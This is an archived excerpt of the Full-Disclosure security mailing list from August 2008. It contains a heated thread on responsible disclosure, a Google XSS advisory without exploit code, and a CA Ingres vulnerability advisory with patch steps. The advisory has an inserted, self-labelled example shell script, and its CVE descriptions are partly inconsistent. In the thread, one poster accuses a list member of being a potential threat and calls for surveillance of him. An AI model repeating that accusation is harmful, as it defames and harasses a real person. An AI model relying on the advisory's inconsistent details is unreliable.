>>> - The community must be told the date the Responsible Disclosure Act expires and disclosure can be made.
>>>
>>> - The community must be told that security researcher and vendor can go back to the judge after 4 weeks and ask for extension of the act if extra time is needed; this must be announced to the community again with notice.
>>>
>>> All members of the community who break the Responsible Disclosure Act are breaking the law and face charges.
>>>
>>> Obviously this is just an email I rattled up in five minutes during a water machine break, so the big guys in the industry can take these ideas and throw them into a properly put together act.
>>>
>>> I think Dan Kaminsky should lobby the industry and the government to get something like this drawn up, since he is the one who has inspired me to come up with the Responsible Disclosure Act.
>>>
>>> I kind of feel sorry for Dan Kaminsky, and that HD Moore and |)ruid had to be dick heads about releasing code on purpose against the request of Dan Kaminsky, the vendors and people who agree with responsible disclosure, especially in exceptional circumstances like the DNS flaw.
>>>
>>> Maybe we should name it "Kaminsky's Law" out of solidarity for Dan.
>>>
>>> All the best,
>>>
>>> n3td3v
>>>
>>>
>>> ---------- Forwarded message ----------
>>> From:
>>> Date: Thu, Jul 24, 2008 at 5:56 PM
>>> Subject: Re: [Full-disclosure] Comments on: DNS exploit code is in the wild
>>> To: n3td3v
>>> Cc: full-disclosure at lists.grok.org.uk
>>>
>>>
>>> On Thu, 24 Jul 2008 16:17:08 BST, n3td3v said:
>>>
>>>> This whole HD Moore savior of info sec thing has gone on long enough, its time to see him for what he is and get him slammed up in jail along with his counterpart |)ruid.
>>>
>>> I'll point out that you happen to live in the country that invented the concept of "habeas corpus". In other words, you can't slam him in jail unless you actually *charge* him with something.
>>>
>>> Please tell us which countr(y|ies) you intend to have him charged in, and with what offense. Specific references to statutes would be appreciated (for starters, I'll help you out and point out that in the US, he probably could *not* be charged under 17 USC 1201 (the DMCA anti-circumvention clause), nor under 18 USC 1030 (the primary federal anti-hacking statute), unless you have actual evidence that HD personally hacked into a computer covered by 18 USC 1030. You run into similar issues with 18 USC 2701 (access to stored communication).
>>>
>>> You *might* be able to make a case under 18 USC 2512 (dealing in devices for intercepting communications), except that there's the nasty clause "knowing or having reason to know that the design of such device renders it primarily useful for the purpose of the surreptitious interception of wire, oral, or electronic communications;" - and you'd fail on the "primarily" because there's lots of *other* uses for Metasploit.
>>>
>>> He *is* probably in violation of 36 USC 117, 7 USC 411b, and 26 USC 7523(a)(1), however.
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>
From jf at danglingpointers.net Wed Aug 6 20:15:51 2008
From: jf at danglingpointers.net (jf)
Date: Wed, 6 Aug 2008 19:15:51 +0000 (UTC)
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: <21881.1217962645@turing-police.cc.vt.edu>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu>
Message-ID:

> And even if they *got* attacked, it's quite possible that the upsides of not
> bothering to do something outweighed the risks. If you estimate that the
> cost (including "things you could have spent your time doing") is more than
> the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But
> in the time I'd waste dealing with the issue, I could generate something that
> will get us $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore
> it, I come out $1,500 ahead if we get hit, and $2,000 if we don't".

so as a student worker, that's what, like a month of your time?
From xploitable at gmail.com Wed Aug 6 15:49:24 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 6 Aug 2008 15:49:24 +0100
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To:
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310808060749t25beac58nc4ad38e0f81875a@mail.gmail.com>

On Wed, Aug 6, 2008 at 8:15 PM, jf wrote:
>> And even if they *got* attacked, it's quite possible that the upsides of not
>> bothering to do something outweighed the risks. If you estimate that the
>> cost (including "things you could have spent your time doing") is more than
>> the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But
>> in the time I'd waste dealing with the issue, I could generate something that
>> will get us $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore
>> it, I come out $1,500 ahead if we get hit, and $2,000 if we don't".
>
> so as a student worker, that's what, like a month of your time?
>

The guy definitely needs wire tapped and perhaps a psychologist. Especially
when he started ranting about money and the value of human life in relation
to security. I just hope Virginia Tech and the F.B.I get involved in
monitoring him for his comments, especially after the Virginia Tech massacre
and the likes. We could have a fruit ball member of staff at the institute
considering something criminal to cut corners in cyber security... or even
something murderous in real life depending on what type of mental condition
he has actually acquired to make him talk like this.
On Tue, Aug 5, 2008 at 9:57 PM, wrote:
> They calculate a "value of a life", and use it to evaluate things like
> environmental and safety regulations: If a life is worth $5M, and the
> regulation is projected to save 500 lives (via lower risk of cancer, fewer car
> crashes, whatever), the regulation has to cost less than $2.5B to implement to
> be worth it. If it costs $2B, but only saves 50 lives, that's $40M per life
> and not worth it.
>

All the best,

n3td3v

From alfredo.melloni at gmail.com Wed Aug 6 16:39:13 2008
From: alfredo.melloni at gmail.com (Alfredo Melloni)
Date: Wed, 6 Aug 2008 17:39:13 +0200
Subject: [Full-disclosure] Google Notebook and Google Bookmarks Cross Site Scripting Vulnerabilities
Message-ID:

Google Notebook and Google Bookmarks Cross Site Scripting Vulnerabilities

I. Background:

Google Notebook is a service where it's possible to "add text, images, and links from web pages without leaving your browser window." Google Bookmarks is a service where it's possible to save bookmarks.

II. Description:

Three cross site scripting vulnerabilities were identified inside Google Notebook. A remote attacker can create a malformed notebook and, through the sharing option inside Google Notebook, invite other users to view it in order to obtain their cookie. User interaction is required to exploit all three vulnerabilities.

Browser affected: Firefox 3.
Browser not affected: Internet Explorer 7, Opera 9.5, Safari 3.

One cross site scripting vulnerability was identified inside Google Bookmarks. A remote attacker can create a malformed bookmark inside his account and then share it with other users to obtain their cookie. User interaction is required to exploit this vulnerability.

Browser affected: Mozilla Firefox 3, Internet Explorer 7, Opera 9.5, Safari 3

III. Vendor Response:

Google acknowledged 4 vulnerabilities and has deployed a fix for them.

IV. Disclosure timeline:

23/07/08 - First vulnerability discovered
23/07/08 - Google informed
24/07/08 - Google confirmed first bug
31/07/08 - Google fixed the first vulnerability
31/07/08 - Three new vulnerabilities discovered
31/07/08 - Google informed
31/07/08 - Google confirmed these three new bugs
01/08/08 - Google fixed all vulnerabilities submitted

Regards
Alfredo Melloni

From James.Williams at ca.com Wed Aug 6 16:49:52 2008
From: James.Williams at ca.com (Williams, James K)
Date: Wed, 6 Aug 2008 11:49:52 -0400
Subject: [Full-disclosure] CA Products That Embed Ingres Multiple Vulnerabilities
Message-ID: <649CDCB56C88AA458EFF2CBF494B6204053903FB@USILMS12.ca.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: CA Products That Embed Ingres Multiple Vulnerabilities

CA Advisory Date: 2008-08-01

Reported By: iDefense Labs

Impact: A remote attacker can execute arbitrary code, gain privileges, or cause a denial of service condition.

Summary: CA products that embed Ingres contain multiple vulnerabilities that can allow a remote attacker to execute arbitrary code, gain privileges, or cause a denial of service condition. These vulnerabilities exist in the products and on the platforms listed below. These vulnerabilities do not impact any Windows-based Ingres installation.

The first vulnerability, CVE-2008-3356, allows an unauthenticated attacker to potentially set the user and/or group ownership of a verifydb log file to be Ingres, allowing read/write permissions to both.

The second vulnerability, CVE-2008-3357, allows an unauthenticated attacker to exploit a pointer overwrite vulnerability to execute arbitrary code within the context of the database server process.

The third vulnerability, CVE-2008-3389, allows an unauthenticated attacker to obtain ingres user privileges.
However, when combined with the unsecured directory privileges vulnerability (CVE-2008-3357), root privileges can be obtained.

Mitigating Factors: These vulnerabilities do not impact any Windows-based Ingres installation.

Severity: CA has given these vulnerabilities a High risk rating.

Affected Products:
Admin r8.1 SP2
Advantage Data Transformer r2.2
Allfusion Harvest Change Manager r7.1
CA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3
CA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3
CA Directory r8.1
CA Job Management Option R11.0
CA Single Sign-On r8.1
CleverPath Aion BPM r10.1, r10.2
EEM 8.1, 8.2, 8.2.1
eTrust Audit/SCC 8.0 sp2
Identity Manager r12
NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11
Unicenter Asset Management r11.1, r11.2
Unicenter Remote Control r11.2
Unicenter Service Catalog r2.2, r11.1
Unicenter Service Metric Analysis r11.1
Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2
Unicenter Software Delivery r11.1, r11.2
Unicenter Workload Control Center r11

Affected Platforms:
1. Ingres verifydb file create permission override (CVE-2008-3356)
   This vulnerability impacts all platforms except Windows.
2. Ingres un-secure directory privileges with utility ingvalidpw (CVE-2008-3357)
   This vulnerability impacts only Linux and HP platforms.
3. Ingres verifydb, iimerge, csreport buffer overflow (CVE-2008-3389)
   This vulnerability impacts only Linux and HP platforms.

Status and Recommendation:
The most prudent course of action for affected customers is to download and apply the corrective maintenance. However, updates are provided only for the following releases: 2.6 and r3

Important: Customers using products that embed an earlier version of Ingres r3 should upgrade Ingres to the release that is currently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX platforms) before applying the maintenance updates. Please contact your product's Technical Support team for more information.
For these products:
Admin r8.1 SP2
CA ARCserve Backup for Linux r11.5 SP2/SP3
CA Directory r8.1
CA Job Management Option R11.0
CA Single Sign-On r8.1
EEM 8.2
EEM 8.2.1
Identity Manager r12
NSM r11
Unicenter Asset Management r11.1
Unicenter Asset Management r11.2
Unicenter Remote Control r11.2
Unicenter Service Catalog r11.1
Unicenter Service Metric Analysis r11.1
Unicenter ServicePlus Service Desk r11
Unicenter ServicePlus Service Desk r11.1
Unicenter ServicePlus Service Desk r11.2
Unicenter Software Delivery r11.1
Unicenter Software Delivery r11.2
Unicenter Workload Control Center r11

Apply the update below that is listed for your platform (note that URLs may wrap):

AIX [3.0.3 (r64.us5/211)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z

HP-UX Itanium [3.0.3 (i64.hpu/211)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z

HP-UX RISC [3.0.3 (hp2.us5/211)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z

Linux AMD [3.0.3 (a64.lnx/211)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z

Linux Intel 32bit [3.0.3 (int.lnx/103)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z

Linux Itanium [3.0.3 (i64.lnx/211)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z

Solaris SPARC [3.0.3 (su9.us5/211)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z

Solaris x64/x86 [3.0.3 (a64.sol/211)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z

Ingres r3 Vulnerability Updates Install Steps (August 1, 2008)

Unix/Linux:

1. Log on to your system using the installation owner account and make sure the environment is set up correctly:
   1. II_SYSTEM must be set to the Ingres system files
   2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories.
2. Change directory to the root directory of the Ingres installation or use a previously created directory.
   cd $II_SYSTEM/ingres or cd
3. Copy the downloaded maintenance update file into the current directory and uncompress
4. Read in the update file with the following commands:
   umask 022
   tar xf [update_file]
   This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX
   Note: 'XXXXX' in patchXXXXX refers to the update number
5. Stop all Ingres processes with the 'ingstop' utility:
   ingstop
6. Change directory to the patch directory:
   cd patchXXXXX
7. Within the patch directory run the following command:
   ./utility/iiinstaller
   Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced.
   Note: The patch can also be installed silently using the '-m' flag with iiinstaller:
   ./utility/iiinstaller -m
8. Once the patch install has been completed, re-link the iimerge binary with the following command:
   iilink
9. Ingres can then be restarted with the 'ingstart' utility:
   ingstart

For these products:
Advantage Data Transformer r2.2
Allfusion Harvest Change Manager r7.1
ARCserve for Linux r11.5 GA/SP1
CleverPath Aion BPM r10.1
CleverPath Aion BPM r10.2

Apply the build below that is listed for your platform (note that URLs may wrap):

AIX
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12833-r64-us5.tar

HP-UX Itanium
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12831-i64-hpu.tar

HP-UX RISC
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12830-hp2-us5.tar

Linux AMD EI build
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-x86_64.tar.gz

Linux AMD II build
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-x86_64.tgz

Linux Intel EI build
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-EI-linux-i386.tgz

Linux Intel II build
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-pc-linux-i386.tgz

Linux Itanium EI build
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-ia64.tar.gz

Linux Itanium II build
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-ia64.tgz

Solaris SPARC
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12834-su9-us5.tar

Solaris x64/x86
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12832-a64-sol.tar

Ingres r3 Build Install Steps (August 1, 2008)

Important: Prior to installing the build, a full operating system backup of the $II_SYSTEM/ingres directory on Unix/Linux and %II_SYSTEM%\ingres directory on Windows must be taken with Ingres completely shut down. Also, a backup of any other DATA locations that you may have must be taken, again with Ingres shut down.
In case there is a problem with the update install, this allows Ingres to be restored from the backup.

Unix:

1. Log in to the system as the installation owner and make sure the environment is set up correctly:
   1. II_SYSTEM must be set to the Ingres home directory
   2. PATH must include $II_SYSTEM/ingres/bin and $II_SYSTEM/ingres/utility directories
   3. Add $II_SYSTEM/ingres/lib to the shared library path
   4. Set TERM to 'vt100' and TERM_INGRES to 'vt100fx'
2. Copy the downloaded update file to the /tmp directory and uncompress
3. Read in the update file with the following commands:
   umask 022
   tar xf [update_file]
   This creates a directory containing the distribution and other files.
4. Stop all applications that may be connected to or using any of the files in the Ingres instance.
5. Stop all Ingres processes with the 'ingstop' utility:
   ingstop
6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. Also, copy the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files to a safe location to ensure that the configuration can be restored.
7. From the root directory of the Ingres installation ($II_SYSTEM/ingres), run the following command:
   tar xf /tmp//ingres.tar install
8. Run the following command:
   install/ingbuild
9. The initial install screen appears.
10. In the Distribution medium enter the full path to the 'ingres.tar' file (including the file) (See step 4).
11. Choose PackageInstall from the list of installation options and then choose 'Stand alone DBMS Server' from the list of packages. Then choose ExpressInstall.
12. Choose Yes in the pop-up screen and press the Enter key. The install utility verifies that each component was transferred properly from the distribution medium. When this is finished (without errors), another pop-up screen for setting up the components comes up.
13. Select Yes and press the Enter key to go to the Setup program.
14. Once the installation is complete, check the $II_SYSTEM/ingres/files/install.log for any errors. Also, check the $II_SYSTEM/ingres/version.rel file to verify the new build is referenced; this should show 3.0.3 for the build.
15. If there are no errors, then restore the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files from the copies made in step 6 to replace the existing files.
16. Start Ingres using the 'ingstart' utility:
   ingstart
17. Upgrade the databases in the installation to the new release level:
   upgradedb -all

Linux:

1. Log on to the machine as 'root'.
2. Copy the downloaded build update file to a previously chosen directory and uncompress.
3. Read in the update file with the following command:
   tar xf [update file]
   This creates a directory containing rpm packages for all of the Ingres tools.
4. Shut down any non-Ingres application(s) that may be connected to or using any of the files in the specified Ingres instance.
5. Stop all Ingres processes with the 'ingstop' utility:
   ingstop
6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere.
7. From the directory that was created in step 3, install the update rpms with the following command:
   rpm -Uvh *.rpm
   If the following error is seen for either the 'ca-ingres-documentation-3.0.3-103', the 'ca-ingres-CATOSL-3.0.3-103' or the 'ca-cs-utils-11.0.04348-0000' (or all of them) packages, remove them from the directory containing the rpms and re-run the above command:
   package is already installed
8. If the installation finishes successfully, then log on as 'ingres' to the machine and start Ingres using the 'ingstart' utility:
   ingstart
9. Upgrade the 'mdb' database with the following command:
   upgradedb -all

For these products:
CA ARCserve Backup for Unix r11.1
CA ARCserve Backup for Unix r11.5 GA/SP1/SP2
CA ARCserve Backup for Unix r11.5 SP3
CA ARCserve Backup for Linux r11.1
EEM 8.1
eTrust Audit/SCC 8.0 sp2
NSM 3.0 0305
NSM 3.1 0403
NSM r3.1 SP1 0703
Unicenter Service Catalog r2.2
Unicenter ServicePlus Service Desk 6.0

Apply the update below that is listed for your platform (note that URLs may wrap):

AIX 32bit [2.6/xxxx (rs4.us5/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12718.tar.Z

AIX 64bit [2.6/xxxx (r64.us5/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12798.tar.Z

HP-UX with ARCserve 11.1 or 11.5/GA/SP1/SP2/SP3
https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&actionID=3

HP-UX Itanium [2.6/xxxx (i64.hpu/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12748.tar.Z

HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12742.tar.Z

HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)DBL]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12888.tar.Z

HP-UX RISC 64bit [2.6/xxxx (hp2.us5/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12749.tar.Z

HP Tru64 UNIX [2.6/xxxx (axp.osf/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12676.tar.Z

Linux AMD64 [2.6/xxxx (a64.lnx/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12809.tar.Z

Linux Intel 32bit [2.6/xxxx (int.lnx/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12645.tar.Z

Linux Intel 32bit [2.6/xxxx (int.lnx/00)DBL]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12647.tar.Z

Linux Intel 32bit [2.6/xxxx (int.lnx/00)LFS]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12646.tar.Z

Linux Itanium [2.6/xxxx (i64.lnx/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12648.tar.Z

Linux S/390 [2.6/xxxx (ibm.lnx/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12877.tar.Z

Solaris SPARC 32bit [2.6/xxxx (su4.us5/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12713.tar.Z

Solaris SPARC 32bit double [2.6/xxxx (su4.us5/00)DBL]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12879.tar.Z

Solaris SPARC 64bit [2.6/xxxx (su9.us5/00)]
ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12751.tar.Z

Ingres 2.6 Vulnerability Updates Install Steps (August 1, 2008)

Unix/Linux:

1. Log on to your system using the installation owner account and make sure the environment is set up correctly:
   1. II_SYSTEM must be set to the Ingres system files
   2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories.
2. Change directory to the root directory of the Ingres installation or use a previously created directory.
   cd $II_SYSTEM/ingres or cd
3. Copy the downloaded maintenance update file into the current directory and uncompress
4. Read in the update file with the following commands:
   umask 022
   tar xf [update_file]
   This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX
   Note: 'XXXXX' in patchXXXXX refers to the update number
5. Stop all Ingres processes with the 'ingstop' utility:
   ingstop
6. Change directory to the patch directory:
   cd patchXXXXX
7. Within the patch directory run the following command:
   ./utility/iiinstaller
   Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced.
   Note: The patch can also be installed silently using the '-m' flag with iiinstaller:
   ./utility/iiinstaller -m
8. Once the patch install has been completed, re-link the iimerge binary with the following command:
   iilink
9. Ingres can then be restarted with the 'ingstart' utility:
   ingstart

How to determine if you are affected:

For these products:
Admin r8.1 SP2
ARCserve for Linux r11.5 SP2/SP3
CA Directory r8.1
CA Job Management Option R11.0
CA Single Sign-On r8.1
EEM 8.2
EEM 8.2.1
Identity Manager r12
NSM r11
Unicenter Asset Management r11.1
Unicenter Asset Management r11.2
Unicenter Remote Control r11.2
Unicenter Service Catalog r11.1
Unicenter Service Metric Analysis r11.1
Unicenter ServicePlus Service Desk r11
Unicenter ServicePlus Service Desk r11.1
Unicenter ServicePlus Service Desk r11.2
Unicenter Software Delivery r11.1
Unicenter Software Delivery r11.2
Unicenter Workload Control Center r11

The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel:

UNIX or Linux:
cat version.rel

The release identifier will be as follows:

Operating System          Release identifier
HP Sparc 32/64bit         II 3.0.3 (hp2.us5/211)
HP Itanium                II 3.0.3 (i64.hpu/211)
Intel Solaris 32/64bit    II 3.0.3 (a64.sol/211)
AIX 32/64bit              II 3.0.3 (r64.us5/211)
Solaris 32/64bit          II 3.0.3 (su9.us5/211)
AMD Linux                 II 3.0.3 (a64.lnx/211)
Intel Linux               II 3.0.3 (int.lnx/103)
Itanium Linux             II 3.0.3 (i64.lnx/211)

Notes:
1. You would need to install the Ingres build instead of the patch if either of the following is true:
   1. If the Ingres release for your platform is not 3.0.3 in the release identifier, or
   2. The Ingres release is 3.0.3 but the build level is not 103 for Linux and 211 for all the Unix platforms.
   If either of the above is true then download and apply the latest build for your operating system(s).
2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.

For these products:
Advantage Data Transformer r2.2
Allfusion Harvest Change Manager r7.1
ARCserve for Linux r11.5 GA/SP1
CleverPath Aion BPM r10.1
CleverPath Aion BPM r10.2

The maintenance updates are provided for the latest r3 builds supported by CA, which are 3.0.3/103 (Linux) and 3.0.3/211 (UNIX platforms).
If the build embedded is earlier than 3.0.3, it has to be upgraded to 3.0.3 to fix the vulnerabilities.

The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel:

UNIX or Linux:
cat version.rel

The release identifier will be as follows:

Operating System          Release identifier
HP Sparc 32/64bit         II 3.0.3 (hp2.us5/211)
HP Itanium                II 3.0.3 (i64.hpu/211)
Intel Solaris 32/64bit    II 3.0.3 (a64.sol/211)
AIX 32/64bit              II 3.0.3 (r64.us5/211)
Solaris 32/64bit          II 3.0.3 (su9.us5/211)
AMD Linux                 II 3.0.3 (a64.lnx/211)
Intel Linux               II 3.0.3 (int.lnx/103)
Itanium Linux             II 3.0.3 (i64.lnx/211)

Important: For Linux (AMD, Intel and Itanium) platforms, after applying the build provided on this page, please download and apply the maintenance update. For the other platforms, the builds are patched to the latest maintenance update.

Note:
1. If the release you are using is already 3.0.3 build 103 on Linux and 3.0.3 build 211 on Unix, then download and install the maintenance update.
2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.
For these products:
CA ARCserve Backup for Unix r11.1
CA ARCserve Backup for Unix r11.5 GA/SP1/SP2
CA ARCserve Backup for Unix r11.5 SP3
CA ARCserve Backup for Linux r11.1
EEM 8.1
eTrust Audit/SCC 8.0 sp2
NSM 3.0 0305
NSM 3.1 0403
NSM r3.1 SP1 0703
Unicenter Service Catalog r2.2
Unicenter ServicePlus Service Desk 6.0

The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel:

UNIX or Linux:
cat version.rel

The release identifier will be as follows:

Operating System              Release identifier
AIX 32bit                     II 2.6/xxxx (rs4.us5/00)
AIX 64bit                     II 2.6/xxxx (r64.us5/00)
HP-UX Itanium                 II 2.6/xxxx (i64.hpu/00)
HP-UX RISC 32bit              II 2.6/xxxx (hpb.us5/00)
HP-UX RISC 32bit              II 2.6/xxxx (hpb.us5/00)DBL
HP-UX RISC 64bit              II 2.6/xxxx (hp2.us5/00)
HP Tru64 UNIX                 II 2.6/xxxx (axp.osf/00)
Linux AMD64                   II 2.6/xxxx (a64.lnx/00)
Linux Intel 32bit             II 2.6/xxxx (int.lnx/00)
Linux Intel 32bit             II 2.6/xxxx (int.lnx/00)DBL
Linux Intel 32bit             II 2.6/xxxx (int.lnx/00)LFS
Linux Itanium                 II 2.6/xxxx (i64.lnx/00)
Linux S/390                   II 2.6/xxxx (ibm.lnx/00)
Solaris SPARC 32bit           II 2.6/xxxx (su4.us5/00)
Solaris SPARC 32bit double    II 2.6/xxxx (su4.us5/00)DBL
Solaris SPARC 64bit           II 2.6/xxxx (su9.us5/00)

Note:
1. If the Ingres release embedded in your product is not 2.6, please get the appropriate update here.
2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.
3. For HP-UX platform with CA ARCserve Backup 11.1 or 11.5/GA/SP1/SP2/SP3, download the published ARCserve fix, RO01277:
   https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&actionID=3
   and follow the enclosed instructions to install the security patch.
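The three "How to determine if you are affected" sections above reduce to a few rules on the version.rel release identifier (3.0.3 at the expected build level takes the r3 maintenance update, any other r3 takes the full 3.0.3 build, 2.6 on a listed platform takes the 2.6 patch, anything else goes to Technical Support). The POSIX shell function below applies those rules; it is an added example and not CA's or Ingres' own tooling, the function and label names are this example's own, and the identifiers in the comments and tests are constructed.

```shell
#!/bin/sh
# Added example (not CA/Ingres code): map an Ingres release identifier,
# the "II ..." line printed by `cat version.rel`, to the remediation path
# the CA advisory prescribes. Prints one of:
#   apply-r3-patch     3.0.3 at build 103 (Intel Linux) or 211 (other platforms)
#   install-r3-build   any other r3 release/build: install the 3.0.3 build first
#   apply-2.6-patch    Ingres 2.6 on a platform the advisory lists
#   contact-support    release or platform not covered by the advisory (exit 2)

ingres_remediation() {
    ident=$1

    # "platform/build" sits between the parentheses, e.g. "a64.lnx/211";
    # the DBL/LFS suffix some 2.6 identifiers carry comes after the ")".
    plat_build=${ident#*\(}
    plat_build=${plat_build%%\)*}
    platform=${plat_build%/*}
    build=${plat_build#*/}

    case "$ident" in
        "II 2.6/"*)
            # platforms with a 2.6 patch in the advisory's download list
            case "$platform" in
                rs4.us5|r64.us5|i64.hpu|hpb.us5|hp2.us5|axp.osf|a64.lnx|int.lnx|i64.lnx|ibm.lnx|su4.us5|su9.us5)
                    echo "apply-2.6-patch" ;;
                *)
                    echo "contact-support"; return 2 ;;
            esac
            ;;
        "II 3."*)
            # build level the r3 maintenance update expects per platform
            case "$platform" in
                int.lnx) expected=103 ;;
                a64.lnx|i64.lnx|r64.us5|i64.hpu|hp2.us5|su9.us5|a64.sol) expected=211 ;;
                *) echo "contact-support"; return 2 ;;
            esac
            case "$ident" in
                "II 3.0.3 "*)
                    if [ "$build" = "$expected" ]; then
                        echo "apply-r3-patch"
                    else
                        # right release, wrong build level: take the full build
                        echo "install-r3-build"
                    fi ;;
                *)
                    # an earlier r3 release: upgrade to the 3.0.3 build first
                    echo "install-r3-build" ;;
            esac
            ;;
        *)
            echo "contact-support"; return 2 ;;
    esac
}

# Same decision, read from a version.rel file (first "II " line).
ingres_remediation_file() {
    ingres_remediation "$(sed -n '/^II /{p;q;}' "$1")"
}
```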
Workaround: None

References (URLs may wrap):

CA Support:
http://support.ca.com/

Security Notice for CA Products That Embed Ingres
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989

Solution Document Reference APARs:
